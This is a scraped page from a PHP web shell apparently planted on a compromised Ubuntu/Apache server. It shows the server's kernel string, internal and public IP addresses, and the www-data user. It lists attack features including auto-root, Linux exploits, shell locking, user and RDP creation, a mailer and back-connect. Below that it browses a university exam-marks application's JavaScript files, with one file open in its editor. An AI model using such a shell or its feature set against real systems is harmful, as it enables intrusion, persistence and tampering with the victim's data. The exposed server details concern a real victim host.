Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.170.80
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gcc /
custom_js /
[ HOME SHELL ]
Name
Size
Permission
Action
OnloadModule.js
603
B
-rwxr-xr-x
PasswordPopup.js
1019
B
-rwxr-xr-x
PreMultipleSaveValidation.js
284
B
-rwxr-xr-x
PreSaveModuleValidation.js
331
B
-rwxr-xr-x
batch_setup.js
8.66
KB
-rwxr-xr-x
dash_board.js
593
B
-rwxr-xr-x
deviation_report.js
986
B
-rwxr-xr-x
download_upload_mannual.js
1.89
KB
-rwxr-xr-x
evaluation.js
15.24
KB
-rwxr-xr-x
evaluationreport.js
680
B
-rwxr-xr-x
freeze_marks.js
2.88
KB
-rwxr-xr-x
gandhiGridValidation.js
280
B
-rwxr-xr-x
include_js.js
3
B
-rwxr-xr-x
marks_deviation_report.js
1023
B
-rwxr-xr-x
month_year.js
1.48
KB
-rwxr-xr-x
postSaveSchemaGroupDetails.js
252
B
-rwxr-xr-x
practical_entry_freezing.js
11.73
KB
-rwxr-xr-x
practical_marks.js
7.52
KB
-rwxr-xr-x
practical_marks_mis.js
15.57
KB
-rwxr-xr-x
practical_report_popups.js
2.8
KB
-rwxr-xr-x
preCustomGridEditValidation.js
342
B
-rwxr-xr-x
report_setup.js
19.93
KB
-rwxr-xr-x
report_setup_popup.js
4.43
KB
-rwxr-xr-x
revaluation_report.js
473
B
-rwxr-xr-x
user_report.js
5.05
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : marks_deviation_report.js
function CallEnableMarksDeviationReport() { $("#page_main_div").load('html_modules/marks_deviation_report.html',function() { document.getElementById('display_module_name').innerHTML = 'Marks Deviation Report'; document.getElementById('module_name_for_save').value = 'Marks Deviation Report'; $("#from_college_code").val(getCookie("college_code")); $("#to_college_code").val(getCookie("college_code")); if(getCookie('user_type')=="SuperUser") { $('#from_college_code').removeAttr('disabled', 'disabled'); $('#to_college_code').removeAttr('disabled', 'disabled'); } getDefaultHeadFooterLinks("Marks Deviation Report"); }); } function GenerateMarkDeviationReport() { var str="&from_college_code="+trim(($("#from_college_code").val())); str+="&to_college_code="+trim(($("#to_college_code").val())); str+="&from_qp_code="+ ($("#from_qp_code").val()); str+="&to_qp_code="+trim ($("#to_qp_code").val()); //alert(str); window.location.href = $host_url+"GenerateMarkDeviationReport"+str; }
Close